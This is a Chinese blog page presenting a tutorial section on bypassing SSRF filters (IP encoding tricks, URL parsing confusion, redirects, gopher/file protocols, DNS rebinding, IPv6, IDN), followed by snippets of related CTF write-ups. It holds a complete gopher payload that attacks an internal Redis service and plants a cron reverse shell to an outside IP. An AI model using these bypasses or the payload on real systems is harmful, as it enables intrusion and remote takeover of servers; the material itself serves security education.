利用ssrf上传文件到服务器,4.4. SSRF

最新推荐文章于 2024-08-12 09:46:56 发布
最新推荐文章于 2024-08-12 09:46:56 发布
阅读量196 收藏
点赞数

4.4.4. 过滤绕过¶

4.4.4.1. 更改IP地址写法¶

一些开发者会通过对传过来的URL参数进行正则匹配的方式来过滤掉内网IP,如采用如下正则表达式:

^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$

^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

对于这种过滤我们采用改编IP的写法的方式进行绕过,例如192.168.0.1这个IP地址可以被改写成:

8进制格式:0300.0250.0.1

16进制格式:0xC0.0xA8.0.1

10进制整数格式:3232235521

16进制整数格式:0xC0A80001

合并后两位:1.1.278 / 1.1.755

合并后三位:1.278 / 1.755 / 3.14159267

另外IP中的每一位,各个进制可以混用。

访问改写后的IP地址时,Apache会报400 Bad Request,但Nginx、MySQL等其他服务仍能正常工作。

另外,0.0.0.0这个IP可以直接访问到本地,也通常被正则过滤遗漏。

4.4.4.2. 使用解析到内网的域名¶

如果服务端没有先解析IP再过滤内网地址,我们就可以使用localhost等解析到内网的域名。

另外 xip.io 提供了一个方便的服务,这个网站的子域名会解析到对应的IP,例如192.168.0.1.xip.io,解析到192.168.0.1。

4.4.4.3. 利用解析URL所出现的问题¶

在某些情况下,后端程序可能会对访问的URL进行解析,对解析出来的host地址进行过滤。这时候可能会出现对URL参数解析不当,导致可以绕过过滤。

比如 http://www.baidu.com@192.168.0.1/ 当后端程序通过不正确的正则表达式(比如将http之后到com为止的字符内容,也就是www.baidu.com,认为是访问请求的host地址时)对上述URL的内容进行解析的时候,很有可能会认为访问URL的host为www.baidu.com,而实际上这个URL所请求的内容都是192.168.0.1上的内容。

4.4.4.4. 利用跳转¶

如果后端服务器在接收到参数后,正确的解析了URL的host,并且进行了过滤,我们这个时候可以使用跳转的方式来进行绕过。

可以使用如 http://httpbin.org/redirect-to?url=http://192.168.0.1 等服务跳转,但是由于URL中包含了192.168.0.1这种内网IP地址,可能会被正则表达式过滤掉,可以通过短地址的方式来绕过。

常用的跳转有302跳转和307跳转,区别在于307跳转会转发POST请求中的数据等,但是302跳转不会。

4.4.4.5. 通过各种非HTTP协议¶

如果服务器端程序对访问URL所采用的协议进行验证的话,可以通过非HTTP协议来进行利用。

比如通过gopher,可以在一个url参数中构造POST或者GET请求,从而达到攻击内网应用的目的。例如可以使用gopher协议对与内网的Redis服务进行攻击,可以使用如下的URL:

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

除了gopher协议,File协议也是SSRF中常用的协议,该协议主要用于访问本地计算机中的文件,我们可以通过类似 file:///path/to/file 这种格式来访问计算机本地文件。使用file协议可以避免服务端程序对于所访问的IP进行的过滤。例如我们可以通过 file:///d:/1.txt 来访问D盘中1.txt的内容。

4.4.4.6. DNS Rebinding¶

一个常用的防护思路是:对于用户请求的URL参数,首先服务器端会对其进行DNS解析,然后对于DNS服务器返回的IP地址进行判断,如果在黑名单中,就禁止该次请求。

但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间差,利用这个时间差,可以进行DNS重绑定攻击。

要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0。这样就可以进行攻击了,完整的攻击流程为:

服务器端获得URL参数,进行第一次DNS解析,获得了一个非内网的IP

对于获得的IP进行判断,发现为非黑名单IP,则通过验证

服务器端对于URL进行访问,由于DNS服务器设置的TTL为0,所以再次进行DNS解析,这一次DNS服务器返回的是内网地址。

由于已经绕过验证,所以服务器端返回访问内网资源的结果。

4.4.4.7. 利用IPv6¶

有些服务没有考虑IPv6的情况,但是内网又支持IPv6,则可以使用IPv6的本地IP如 [::] 0000::1 或IPv6的内网域名来绕过过滤。

4.4.4.8. 利用IDN¶

一些网络访问工具如Curl等是支持国际化域名(Internationalized Domain Name,IDN)的,国际化域名又称特殊字符域名,是指部分或完全使用特殊的文字或字母组成的互联网域名。

在这些字符中,部分字符会在访问时做一个等价转换,例如 ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ 和 example.com 等同。利用这种方式,可以用 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ 等字符绕过内网限制。

rwwwwwwww
关注
挖洞经验:通过Vimeo的文件上传功能发现其SSRF漏洞
墨痕诉清风的博客
03-09 578
比如,按以上原理,如果我的VPS告诉Vimeo后端服务器,我需要上传的文件有500B,那么Vimeo后端服务器就会来取走这500B,但是,如果现在我的VPS告诉Vimeo后端服务器我的文件只有200B,那么之后会发生什么呢?于是,我就直接想测试一下Vimeo平台的上传功能,尤其是通过Google云端硬盘 (Google Drive)上传到Vimeo的一些功能特性,所以,在我的Google云端硬盘中我选择了一个特定视频文件,把它执行到Vimeo的上传操作,然后用BurpSuite查看它的具体上传请求信息。..
4.4. SSRF
Sumarua的博客
07-02 1996
文章目录4.4. SSRF4.4.1. 简介4.4.1.1. 漏洞危害4.4.2. 利用方式4.4.3. 相关危险函数4.4.4. 过滤绕过4.4.4.1. 更改IP地址写法4.4.4.2. 使用解析到内网的域名4.4.4.3. 利用解析URL所出现的问题4.4.4.4. 利用跳转4.4.4.5. 通过各种非HTTP协议4.4.4.6. DNS Rebinding4.4.4.7. 利用IPv64.4.4.8. 利用IDN4.4.5. 可能的利用4.4.5.1. 内网服务4.4.5.2. 云主机4.4.6.
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1541
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
ctfhub ssrf之上传文件
L_2448570135的博客
03-13 558
CTFHUB之ssrf中文件上传的题目内容,记录自己遇到的问题
SSRF POST请求 上传文件 FastCGI协议 Redis协议
最新发布
qq_69100706的博客
08-12 617
SSRF(Server-Side Request Forgery,服务器侧请求伪造)攻击经常被用于探索和利用后端服务的漏洞,包括通过POST请求上传文件,以及滥用FastCGI和Redis协议等。
ssrf 过滤.php,SSRF详细利用方式及getshell
weixin_33955394的博客
03-22 558
本文将分为三个部分讲解0x01 ssrf本地远程及其他验证漏洞方式0x02 ssrf利用redis未授权getshell0x03 ssrf常见的绕过方式0x01 ssrf本地及远程验证方式重新复现一下 顺便复习一下curl和监听端口的命令无回显的ssrf验证本地开启apache服务 在存在ssrf处访问http://10.1.1.200(本机服务地址)查看kali机器服务器日志信息:tail -...
CTFhub ssrf 端口扫描&文件上传
m0_64815693的博客
09-02 2535
CTFhub ssrf 端口扫描&文件上传
实战分析和精华总结:服务器端请求伪造SSRF漏洞数据劫持、复现、分析、利用及修复过程
代码讲故事
12-03 1183
实战分析和精华总结:服务器端请求伪造SSRF漏洞数据劫持、复现、分析、利用及修复过程。 SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6537
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
SSRF漏洞(原理、挖掘点、漏洞利用、修复建议)
zxcvbnmasdflzl的博客
07-19 1948
SSRF (Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。
[红日安全]Web安全Day4 - SSRF实战攻防
hongrisec的博客
02-25 844
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
CTFHUB-SSRF-上传文件
o3Ev的博客
07-12 1405
CTFHUB-SSRF-上传文件 先用file协议读下flag.php的内容: file:///var/www/html/flag.php 可知是随便上传个文件就行 访问127.0.0.1/flag.php,是个上传界面 但并没有提交,所以我们得自己补一个提交按钮: <input type="submit" name="submit"> 随便抓个上传包: 进行两次url编码,得到: POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%
【CTFHub】ssrf漏洞--之上传文件
weixin_57240513的博客
07-24 240
第一步:打开环境 第二步:访问flag.php 第三步:没有提交按钮,所以打开检查器,编辑html代码 第四步:修改代码如下图 第五步:点击提交按钮,抓包提交数据包 第六步:将host后面改为127.0.0.1:80,将数据包发送到repeater 第七步:将乱码的中文删掉重新输入两个中文字 第八步:将数据包保存为txt文件 第九步:将保存的数据包代码进行第一次编码 第十步:将第一次编码后的数据包ctrl+f替换,将%0A替换为%0A%0D再进行
php allow furl open,CTFHub-SSRF-文件上传
weixin_36098128的博客
03-17 421
提示这次需要上传一个文件到flag.php了.我准备了个302.php可能会有用.祝你好运题解根据提示依次访问下flag.php和302.phphttp://challenge-5a05d44ccb194622.sandbox.ctfhub.com:10080/?url=127.0.0.1/flag.phphttp://challenge-5a05d44ccb194622.sandbox.ctfh...
SSRF学习(5)gopher协议上传文件
m0_64417923的博客
05-14 686
题目:这次需要上传一个文件到flag.php了.祝你好运 首先从目标机本地访问flag.php: url=http://127.0.0.1/flag.php 得到一个文件上传的界面,需要上传一个Webshell。再查看源代码: /?url=file:///var/www/html/flag.php <?php ​ error_reporting(0); ​ if($_SERVER["REMOTE_ADDR"] != "127.0.0.1"){ echo "...
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(二)(上传文件,FastCGI,Redis协议,URL Bypass)
xt350488的博客
06-19 1104
FastCGI是一种用于数据传输的通信协议,与HTTP协议相似,它提供了一个进行数据交换的通道。详细见 https://blog.csdn.net/mysteryflower/article/details/94386461。
SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
m0_57379855的博客
03-23 5711
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序中把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 8529
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
SSRF - ctfhub - 1【内网访问、伪协议读取、端口扫描、POST详解、上传文件
bin789456的博客
11-18 2332
写在前面 ssrf无论是生活中还是比赛中都是一种非常常见的漏洞。但一般来说单独考察的较少。后面将从ctfhub和其他平台上来慢慢练习。 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限
SSRF漏洞利用全解析:典型手法与实战案例
1. **攻击步骤**:典型的SSRF攻击流程包括发现目标服务器、构造恶意请求、通过服务器发送请求并接收响应,最后解析或利用响应中的信息。 2. **文件描述符利用**:攻击者可以利用服务器的文件描述符功能,如Apache和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值